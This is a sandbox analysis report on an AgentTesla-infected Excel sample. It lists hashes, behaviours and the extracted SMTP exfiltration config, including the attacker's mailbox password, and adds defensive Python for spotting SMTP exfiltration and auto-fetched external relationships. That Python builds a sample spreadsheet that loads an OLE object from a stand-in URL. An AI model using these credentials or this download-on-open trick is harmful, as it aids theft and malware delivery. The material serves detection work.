General
Target: $267700.xlsx
Size: 200KB
Sample: 210226-nnwe6qpdhx
MD5: df0dbb4b27bda8afcdc08455003739e7
SHA1: 86057b50f54296163776720171c21c2a946778e6
SHA256: 86e3101420d0467712a6920229e34bce70e978598abb37373c53306f937f8db7
SHA512: 4836c2aaf5dc450fb1a859770c735c1cfd2887dbeb779cc15c56e9a840f63e3a7d43d352dad3583eae4db2bcb7d31ea807f7f68258c258b423e9992c652cc3e2
Static task: static1
Behavioral task: behavioral1 (sample $267700.xlsx, resource win7v20201028)
Behavioral task: behavioral2 (sample $267700.xlsx, resource win10v20201028)
Malware Config
Extracted: agenttesla
Protocol: smtp
Host: smtp.privateemail.com
Port: 587
Username: [email protected]
Password: lord@blessme
These are the credentials of the attacker-controlled mailbox that the stealer logs in to in order to send stolen data; the host, port and account are indicators to block and hunt for, not something to log in to.
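The extracted config is the detection hook: AgentTesla delivers its logs as mail through this account, so any endpoint process other than a mail client opening tcp/587 to smtp.privateemail.com is a hit. The script below is an added example and not part of the sandbox report: it runs that logic over constructed Sysmon Event ID 3 (NetworkConnect) records in JSON-lines form. The field names follow Sysmon's; the events, the IP addresses and the choice of vbc.exe as the injected host process are assumptions made for the example.

```python
"""Flag AgentTesla-style SMTP exfiltration in process network-connect events.

Added example (not from the sandbox report). Assumes Sysmon Event ID 3 records
exported as JSON lines with Sysmon's field names (Image, DestinationHostname,
DestinationIp, DestinationPort). All sample events below are constructed.
"""
import json

# Destination taken from the extracted malware config on the page.
EXFIL_HOST = "smtp.privateemail.com"
EXFIL_PORT = 587

# Processes that legitimately speak SMTP from a workstation. Assumption: tune
# this allow-list to your estate; anything else on a mail port is suspicious.
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}
SMTP_PORTS = {25, 465, 587}

# Constructed sample telemetry (TEST-NET addresses, not real resolutions).
# vbc.exe as the injected host is an assumption drawn from the report's
# "Uses the VBS compiler for execution" signature.
SAMPLE_EVENTS = [
    {"EventID": 3, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe",
     "DestinationHostname": "smtp.privateemail.com", "DestinationIp": "198.51.100.23",
     "DestinationPort": 587, "Protocol": "tcp"},
    {"EventID": 3, "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "DestinationHostname": "smtp.office365.com", "DestinationIp": "203.0.113.10",
     "DestinationPort": 587, "Protocol": "tcp"},
    {"EventID": 3, "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "DestinationHostname": "cdn.example.net", "DestinationIp": "203.0.113.44",
     "DestinationPort": 443, "Protocol": "tcp"},
    # Hostname missing (no reverse lookup); only the port heuristic can catch it.
    {"EventID": 3, "Image": r"C:\Users\user\AppData\Roaming\svchost.exe",
     "DestinationHostname": "", "DestinationIp": "198.51.100.23",
     "DestinationPort": 587, "Protocol": "tcp"},
]


def classify(event):
    """Return the list of reasons an event is suspicious (empty if benign)."""
    if event.get("EventID") != 3:
        return []
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    host = (event.get("DestinationHostname") or "").lower()
    port = int(event.get("DestinationPort", 0))
    reasons = []
    if host == EXFIL_HOST and port == EXFIL_PORT:
        reasons.append("destination matches extracted AgentTesla SMTP config")
    if port in SMTP_PORTS and image not in MAIL_CLIENTS:
        reasons.append(f"non-mail-client {image} speaking SMTP on tcp/{port}")
    return reasons


def scan(lines):
    """Parse a JSON-lines export and return [(image, destination, port, reasons)]."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        reasons = classify(ev)
        if reasons:
            dest = ev.get("DestinationHostname") or ev.get("DestinationIp")
            hits.append((ev["Image"], dest, int(ev["DestinationPort"]), reasons))
    return hits


def scan_samples():
    """Run the scanner over the constructed events (same path as a real export)."""
    return scan(json.dumps(e) for e in SAMPLE_EVENTS)


if __name__ == "__main__":
    for image, dest, port, reasons in scan_samples():
        print(f"{image} -> {dest}:{port}")
        for r in reasons:
            print(f"    {r}")
```

The config match is the high-confidence rule; the port heuristic is the generalisation that still fires when the operator rotates to another mail provider, at the cost of needing the mail-client allow-list kept accurate.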
Targets
Target: $267700.xlsx (200KB; hashes as listed under General)
Score: 10/10
AgentTesla
Agent Tesla is a .NET-based information stealer and remote access tool (RAT) that harvests credentials, keystrokes and clipboard data and sends them to the operator, here over SMTP using the extracted config.
- AgentTesla Payload
- Blocklisted process makes network request
- Executes dropped EXE
- Abuses OpenXML format to download file from external location (an external relationship in the document package, fetched on open without a macro)
- Loads dropped DLL
- Uses the VBS compiler for execution (vbc.exe, the .NET Visual Basic compiler, typically started only to host the injected payload)
- Suspicious use of SetThreadContext (the thread-context rewrite used in process hollowing)
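The "Abuses OpenXML format to download file from external location" signature refers to a relationship part (a .rels file inside the zip) whose Target is a URL with TargetMode="External"; for relationship types such as oleObject or attachedTemplate, Office fetches that target when the part is loaded, no macro required. The script below is an added example, not the report's or the sandbox's code: it constructs a minimal .xlsx in memory (not the $267700.xlsx sample, whose contents are not on the page) and lists every external relationship together with whether Office would load it automatically. The part names, relationship IDs and URL are made up for the example.

```python
"""List external relationships in an OOXML package (xlsx/docx/pptx).

Added example, not part of the sandbox report. An OOXML file is a zip of XML
parts; cross-part links live in *.rels files, and TargetMode="External" marks
a target outside the package. The sample package is constructed in memory.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship types whose external target Office resolves when the document
# is opened (as opposed to hyperlinks, which need a user click).
AUTOLOAD_TYPES = {"oleObject", "attachedTemplate", "externalLink", "externalLinkPath"}


def external_relationships(data: bytes):
    """Return [(rels_part, rel_type, target, autoload)] for every external rel."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.findall(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                findings.append((name, rel_type, target, rel_type in AUTOLOAD_TYPES))
    return findings


def build_sample_xlsx(external_url: str) -> bytes:
    """Construct a minimal package with one auto-loaded and one click-only external rel."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("_rels/.rels", f'''<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{REL_BASE}officeDocument" Target="xl/workbook.xml"/>
</Relationships>''')
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
        # The sheet's rels part: an OLE object pulled from a URL (fetched on
        # open) next to an ordinary hyperlink (needs a click).
        zf.writestr("xl/worksheets/_rels/sheet1.xml.rels", f'''<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{REL_BASE}oleObject" Target="{external_url}" TargetMode="External"/>
  <Relationship Id="rId2" Type="{REL_BASE}hyperlink" Target="https://example.org/help" TargetMode="External"/>
</Relationships>''')
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_xlsx("http://203.0.113.7/stage2.bin")  # constructed URL
    for part, rel_type, target, autoload in external_relationships(sample):
        flag = "FETCHED ON OPEN" if autoload else "user-triggered"
        print(f"{part}: {rel_type} -> {target} [{flag}]")
```

Run it against a real suspect file with `external_relationships(open(path, "rb").read())`; any auto-loaded type pointing at an http(s) or UNC target is the download primitive this signature describes, and the target URL is the indicator to extract before detonation.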